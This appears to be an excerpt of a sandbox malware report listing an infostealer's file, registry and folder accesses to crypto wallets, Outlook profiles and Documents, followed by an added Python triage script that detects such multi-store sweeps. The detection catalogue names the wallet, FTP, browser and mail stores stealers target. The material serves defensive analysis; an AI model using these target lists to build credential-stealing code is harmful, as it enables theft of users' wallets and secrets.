Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: number of queries: 2130
Source: Yara match File source: 10.3.e192e43b61.exe.1197b30.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000003.2624288449.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1786821317.0000000001774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2883370297.000000000111B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2623865515.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2663469865.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1786888167.0000000001775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2658010814.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2623816326.0000000001193000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1786861408.0000000001774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2605977580.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2608212064.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2639670507.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2663336618.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2623503748.000000000118F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR
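The behaviour lines above are the raw evidence behind the "Found many strings related to Crypto-Wallets" and stealer verdicts: three separate processes open the wallet directories of Exodus, Electrum, Ledger Live, Coinomi, Jaxx, Atomic and Guarda, FTP client configuration (FileZilla recentservers.xml, FTPGetter, SmartFTP, FTPRush), Chrome extension storage and the Outlook MAPI profile keys, then sweep the user's Documents folder. The following is an added triage helper, not part of this Joe Sandbox report or of the sample; it parses lines in the report's "Source: <process> File opened|Key opened|Directory queried: <target>" form, maps each target onto a category of sensitive store and flags any process that touches several categories, which is the generic shape of an infostealer sweep regardless of family. The sample lines are copied from this report; the category catalogue, the category names and the threshold of three categories are the author's assumptions, not sandbox output.

```python
"""Triage helper for Joe Sandbox-style behaviour lines (added example).

Not part of the sandbox report or of the analysed sample. Groups the
File opened / Key opened / Directory queried events by process, classifies
each target path or registry key and flags processes that touch several
kinds of sensitive store. Catalogue and threshold are assumptions.
"""
import re
from collections import defaultdict

# One "Source: ... <action>: <target>" line, with the optional trailing
# "Jump to behavior" link text that the HTML report appends.
LINE_RE = re.compile(
    r"^Source:\s+(?P<process>\S+)\s+"
    r"(?P<action>File opened|Key opened|Directory queried):\s+"
    r"(?P<target>.+?)(?:\s+Jump to behavior)?\s*$"
)

# (category, case-insensitive regex over the target). The names are taken
# from the paths seen in this report; extend the catalogue for other families.
CATALOGUE = [
    ("wallet", r"\\(Exodus|Electrum(-LTC)?|ElectronCash|Ledger Live|Coinomi|Bitcoin|"
               r"Binance|Guarda|atomic(_qt)?|MultiDoge|(com\.liberty\.)?jaxx)(\\|$)"),
    ("ftp_client", r"\\(FileZilla|FTPGetter|FTPInfo|SmartFTP|FTPbox|FTPRush|3D-FTP)\\?"),
    ("browser_extension", r"\\Local Extension Settings\\"),
    ("browser_db", r"\\User Data\\Default\\Web Data$"),
    ("mail_profile", r"\\Windows Messaging Subsystem\\Profiles\\"),
    ("user_documents", r"\\Documents(\\|$)"),
]

# Constructed sample: lines copied from this report (with and without the
# "Jump to behavior" suffix), plus the summary line that must be ignored.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb",
    r"Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data",
    r"Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter",
    r"Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior",
    r"Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BPMLNOBVSB Jump to behavior",
    r"Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Directory queried: number of queries: 2130",
]


def parse_line(line):
    """Return (process, action, target) for a behaviour line, else None."""
    m = LINE_RE.match(line.strip())
    if not m or m.group("target").startswith("number of queries"):
        return None
    return m.group("process"), m.group("action"), m.group("target")


def categorise(target):
    """First catalogue category whose pattern matches the target, else None."""
    for category, pattern in CATALOGUE:
        if re.search(pattern, target, re.IGNORECASE):
            return category
    return None


def profile(lines):
    """Return {process: {category: sorted distinct targets}} for the lines."""
    hits = defaultdict(lambda: defaultdict(set))
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        process, _action, target = parsed
        category = categorise(target)
        if category:
            # Normalise trailing backslashes so "X\" and "X" count once.
            hits[process][category].add(target.rstrip("\\"))
    return {p: {c: sorted(t) for c, t in cats.items()} for p, cats in hits.items()}


def flag_stealers(profiles, min_categories=3):
    """Processes that touched at least min_categories distinct store kinds."""
    return sorted(p for p, cats in profiles.items() if len(cats) >= min_categories)


if __name__ == "__main__":
    result = profile(SAMPLE_LINES)
    for process, cats in result.items():
        print(process, {c: len(t) for c, t in cats.items()})
    print("flagged:", flag_stealers(result))
```

On the sample lines this flags e192e43b61.exe (extension storage, Web Data, FTPGetter) and K7IHXYTNUQJPI2M9UU0ECLE1K.exe (FileZilla, Electrum-LTC, Outlook profile) while file.exe, which only touched wallets and Documents in the excerpt, stays below the threshold; feeding the full report raises all three. The same catalogue transfers to endpoint telemetry that records file and registry opens per process, where the multi-category sweep within seconds of process start is the signal, since each individual path is a legitimate application directory.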

Remote Access Functionality

Source: Yara match File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 32.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3015827110.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2750222076.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2901676931.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3019501243.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.2852632926.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2709864138.0000000005560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.2857203948.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2142029213.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
